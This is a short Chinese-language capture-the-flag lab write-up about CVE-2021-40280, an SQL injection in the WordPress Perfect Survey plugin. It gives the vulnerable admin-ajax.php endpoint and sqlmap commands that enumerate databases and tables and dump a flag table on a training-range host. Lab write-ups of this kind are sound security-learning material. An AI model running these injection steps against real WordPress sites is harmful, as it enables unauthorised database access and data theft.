【春秋云境】CVE-2021-40280靶场实战记录
靶场介绍
WordPress是一个使用PHP语言开发的内容管理系统(CMS),它极大地简化了构建博客或网站的过程,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站(博客)。WordPress不仅为大量商业网站和博客提供支持,它也是创建电子商务商店的流行方式,例如可以创建商业网站、电子商务商店、作品集网站、论坛、社交网络等。在Plugin Perfect Survey存在sql注入漏洞
开启靶场
POC
/wp-admin/admin-ajax.php?action=get_question&question_id=1
解题步骤
访问以下:
http://eci-2ze95j4wqbzeqf5mb1vf.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=get_question&question_id=1
通过sqlmap自动化工具测试
Sqlmap -u “目标”
查看所有数据库
Sqlmap -u “目标” --dbs
查看cms数据库中的表
Sqlmap -u “目标” -D cms --tables
读取cms数据库flag表中的值
Sqlmap-u “目标”-D cms -T flag --dump
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录
请登录/注册后在FreeBuf发布内容哦